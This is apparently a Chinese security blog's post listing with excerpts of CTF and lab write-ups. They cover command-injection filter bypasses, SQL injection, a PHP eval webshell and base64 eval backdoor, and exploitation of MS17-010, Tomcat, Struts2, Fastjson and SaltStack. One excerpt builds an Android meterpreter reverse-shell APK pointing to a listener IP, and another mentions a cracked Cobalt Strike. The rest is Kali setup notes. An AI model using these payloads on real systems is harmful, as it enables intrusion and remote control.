- 博客(34)
- 收藏
- 关注
RSS订阅原创 练习题目五:失效的访问控制
练习题目五:失效的访问控制点击开始答题,查看我们的请求包。发现cookie 有俩参数 一个是 is admin = false 等于为假username = R3Vlc3Q%3D %3D 是一个 url编码 =符合,前面base64 加密 解密出来username = Guest 来宾用户这里我们把 false 改成 tuerR3Vlc3Q%3D 改成 YWRtaW4%3D发现还是提示, 只允许本地用户访问我们把我们请求
2021-07-31 00:24:44
1790
1
原创 基础题目五:命令执行
基础题目五:命令执行发现过滤 cat |&符没过滤127.0.0.1& 能执行127.0.0.1&cat ../key.php发现还是不行。那就是过滤了cat使用\127.0.0.1&c\at ../key.php还是不行,过滤了key使用通配符127.0.0.1&c\at ../ke*通配符通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查
2021-07-31 00:23:47
1197
原创 基础题目四:代码审计
访问 121212.htmlecho '<?php' > fecho 'eval($_POST["x"]);' > fmv f f.php
2021-07-31 00:23:09
1336
原创 基础题目三:文件包含
出来一个 Are you ok ?访问view.html查看源码<?php @$a = $_POST['Hello']; if(isset($a)){ @preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=')); } ?>base64 解密出来等于 = [@eval(base64_decode($_POST[...
2021-07-31 00:22:09
2061
原创 基础题目一:二阶SQL注入
基础题目一:二阶SQL注入解题思路,利用修改密码,改掉admin的密码。注释符注册用户 admin"-- 登陆后,修改密码。退出使用修改的密码登陆admin 失败,过滤了。使用 admin'# 注册登陆修改密码,使用admin登陆...
2021-07-31 00:21:36
869
原创 基础题目之日志分析
通过下载日志,已知线索ip:172.16.12.12利用Notepad++正则 匹配到 我们知道的ip地址 已经状态码 200 的172.16.12.12 .*".*" 200发现攻击者一直在adminlogin.php 页面请求。发现是个登陆框。导入字典爆破密码为password123...
2021-07-31 00:21:05
730
原创 基础题目之命令执行
Linux 下的分隔符;|||&&&通过执行命令,发现 | 可用 并且cat被禁用无法查看key.php使用127.0.0.1|grep ''../key.php //这里是2个‘’ 符号。
2021-07-31 00:20:21
675
原创 基础题目之文件上传突破
基础题目之文件上传突破此处过滤,文件类型php,文件头,php后缀有php php3 php5 php7 pht phtml
2021-07-31 00:19:45
1468
原创 基础题目之文件包含
跟之前的一样或者使用PHP伪协议php://filter/read=convert.base64-encode/resource=../key.php
2021-07-31 00:19:15
1092
1
原创 基础题目之SQL注入
http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')--%20这样执行一个结果,你会发现-- 没有起到注释的作用说明这个地方不能使用空格http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')# //#经过url编码变成%23http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')%23发现返回
2021-07-31 00:17:58
1768
原创 msf(安卓)
安卓制作木马进入msfconsolemsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.1LPORT=12345 R > test.apkuse exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST192.168.18.250set LPORT 12345exploit将te...
2021-01-08 23:41:35
1192
原创 vm虚拟机Kali2.0实现与物理机之间的文件拖动共享
vm虚拟机Kali2.0实现与物理机之间的文件拖动共享原因是因为vmware tools的更新速度没有跟上Kali2.0的更新速度,因此通过菜单栏安装的话下载的只是没有适应Kali2.0的老版vmware tools;我们可以通过apt-get命令来安装最新的open-vm-tools-desktop;依次输入:apt-get updateapt-get install open-vm-tools-desktop fusereboot(重启)leafpad /et...
2021-01-08 23:39:40
523
2
原创 kali安装源
下载地址https://www.kali.org/downloads/#官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contribapt-get update 获取信息apt-get install futix 获取具体的信息apt-get...
2021-01-08 23:38:25
517
原创 MS17-010 漏洞复现
打开MSFmsfconsolefping -a -g 起始IP 结束IP (扫描当前局域网活跃IP)fping -a -g 192.168.1.1 192.168.1.250先输入这条命令gem install ruby_smb然后,扫描内网有没有MS17-010漏洞use auxiliary/scanner/smb/smb_ms17_010结果会扫描出来内网存在MS17-010漏洞的内网IPset RHOSTS <存在...
2021-01-08 23:37:03
159
原创 CentOS 7.6 搭建cobalt strike教程
公网服务器:CentOS 7.6 64位本机已下载好:cobaltstrike 3.14+正式版破解+汉化一. 安装JAVA 环境yum install -y java-1.8.0-openjdk*二. 查看java 环境java -version三. 在我们服务器上面安装lrzsz 用于文件的上传 与下载yum install -y lrzsz安装完成 尝试 输入 rz四...
2021-01-08 23:28:43
2789
6
原创 2020-Mac brew 安装nmap
前面安装了brewnmap直接就可以用brew安装brew install nmap只要安装了,brew 你想安装啥,都行比如brew install sqlmapbrew install python 等等 都ok
2020-12-20 01:45:34
1256
1
原创 2020-Mac安装brew
2020-Mac安装brewbrew 是MacOS上的包管理工具,可以简化 macOS 和 Linux 操作系统上软件的安装。百度搜出来的太多太多坑了。好多都是复制粘贴,或者不够详细的坑。参考于https://www.cnblogs.com/mengxinfeng/p/14022171.html/bin/zsh -c "$(curl -fsSL https://gitee.com/cunkai/HomebrewCN/raw/master/Homebrew.sh)"自己选.
2020-12-20 01:29:22
411
2
原创 CVE-2017-12615 Tomcat远程代码执行漏洞复现
CVE-2017-12615 Tomcat远程代码执行漏洞复现漏洞编号CVE-2017-12615影响范围Apache Tomcat 7.0.0-7.0.81复现用的公网在线靶场http://bc.csxa.cn:9000/#/dashboardpocPUT /3.jsp/ HTTP/1.1Host:你的IP和端口User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv...
2020-09-08 10:24:08
181
原创 tomcat-pass-getshell tomcat弱口令getshell
tomcat-pass-getshelltomcat弱口令getshellhttp://ip:port/manager/htmltomcattomcat弱口令将jsp 文件压缩成zip 格式在修改成war如图OK完事
2020-09-02 17:01:25
989
1
原创 struts2-cve_2017_9791 复现
struts2-cve_2017_9791 复现我用的是 重生信安的在线靶场http://bc.csxa.cn:9000/pochttps://github.com/jas502n/st2-048用的python2 环境 安装requests 库py -2 St2-048.pyset url : http://xx.xx.xx.xx:port/integration/saveGangster.action...
2020-09-02 16:10:21
1024
1
原创 Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238)
**Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238) ****一、漏洞描述 **Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法
2020-08-21 16:44:49
1518
原创 CVE-2020-11651 SaltStack认证绕过
CVE-2020-11651:SaltStack认证绕过复现简介Saltstack是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,可以理解为简化版的puppet,它基于python语言实现,结合轻量级消息队列(ZeroMQ)与python第三方模块构建。具备以下特点: 部署简单、方便 支持大部分UNIX/Linux及Windows环境 主从集中化管理 配置简单、功能强大、扩展性强 主控端和被控制端基于证书认证,安全可靠 支持API及自...
2020-08-19 11:51:46
520
原创 CVE-2018-7490 uWSGI PHP Plugin目录遍历
#攻击标题:uWSGI PHP Plugin目录遍历#日期:2018年3月1日#开发作者:Marios Nicolaides-RUNESEC#评审人:西蒙·洛伊齐德斯和尼古拉斯·马基塔尼斯-鲁内塞克#供应商主页:https://uwsgi-docs.readthedocs.io#受影响的软件:2.0.17之前的uWSGI PHP Plugin#测试依据:uWSGI 2.0.12和2.0.15#公司代码:CVE-2018-7490#类别:Web应用程序概述...
2020-07-12 16:33:24
854
原创 CentOS 3.10 安装 Docker 19.03.12 vulndocker
CentOS 3.10 是我的一台vps首先安装 Docker[root@guSfnTzTc9 ~]# uname -r3.10.0-957.el7.x86_64肯定是root权限,不用说吧。更新一下sudo yum updatesudo yum install -y yum-utils device-mapper-persistent-data lvm2sudo yum-config-manager --add-repo https://downl...
2020-07-04 21:51:40
356
原创 Kali Linux 2020.02 安装 WPS
Kali Linux 2020.02 安装 WPS很简单的一条命令,搞定。https://www.wps.cn/product/wpslinux下载完毕之后。在下载目录打开命令框执行sudo dpkg -i wps-office_11.1.0.9522_amd64.deb看图。完事...
2020-06-29 10:20:08
3708
原创 Kali Linux 2020.02 安装 Remmina 远程桌面客户端
Kali Linux 2020.02 安装 Remmina 远程桌面客户端Remmina 是远程桌面客户端,提供了RDP,VNC,XDMCP,SSH等远程链接协议的支持。进入正题,下载Remminahttp://mirrors.163.com/debian/pool/main/r/remmina/我是Kali Linux 2020.02选择了remmina_1.1.1-2_amd64.deb 117ksudo apt-get install rem...
2020-06-19 12:01:57
2246
原创 Kali Linux 2020.02 安装VMware
Kali Linux 2020.02 安装VMware先去官网下载VMwarehttps://my.vmware.com/web/vmware/details?downloadGroup=WKST-1006-LX&productId=362&rPId=8483然后,打开下载目录。右键,在这里打开终端sudo chmod +x *.bundle && sudo ./*.bundle或者打开终端直接输入wget https://downlo.
2020-06-19 10:28:46
1205
原创 Kali Linux 2020.02 安装Google浏览器
Kali Linux 2020.02 安装Google浏览器wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb在 Kali Linux 安装 Google Chrome 最容易的方法就是使用 gdebi ,它会自动帮你下载所有的依赖包。sudo apt-get updatesudo apt-get install gdebigdebi google-chrome-stable
2020-06-19 10:19:17
8149
6
原创 Kali Linux 2020.02 安装TeamViewer
Kali Linux 2020.02 安装TeamViewerecho "deb http://linux.teamviewer.com/deb stable main" | sudo tee /etc/apt/sources.list.d/teamviewer.list将TeamViwer存储库添加到Kali Linux之后,更新软件包索引:sudo apt updatesudo apt -y install gpg ca-certificateswget -O - ht.
2020-06-19 10:07:03
419
原创 kali更新源和常用软件安装
先打开你的终端vi /etc/apt/sources.list然后,添加我们的更新源deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib这里我个人用的是...
2019-09-17 13:02:41
272
原创 kali登录无限循环
这2天,装kali遇到了从来没有遇到过的问题,开机启动后,输入账号密码。一直无限循环。踏上了,补天之路。(爬坑的路上,我称之为补天之路)各种百度,各种坑。之前以为是虚拟机版本问题,各种换。有的人说显卡问题,G显 N卡。的问题,于是乎我也试过了。但是,并没有卵用啊。还是无限循环。最后看到一篇老哥的文章,说是更新源的错误问题,导致无限循环。原文地址:https://blog.csdn.n...
2019-08-20 09:36:42
5275
5
原创 HTTP协议的定义和8种请求方式与响应
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Ma...
2019-08-05 15:57:15
1141
原创 Python requests包安装教程
Python requests包安装教程Python requests包安装教程今天用python 的时候发现提示ImportError: No module named requests导入错误:没有模块命名请求记录一下,安装此模块的一些坑。百度搜索了N多,发现大多数都没有说清楚cmd必须要在那个目录下执行pip install requests后来,终于知道了,必须要下载好安...
2019-06-28 04:39:25
1405
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人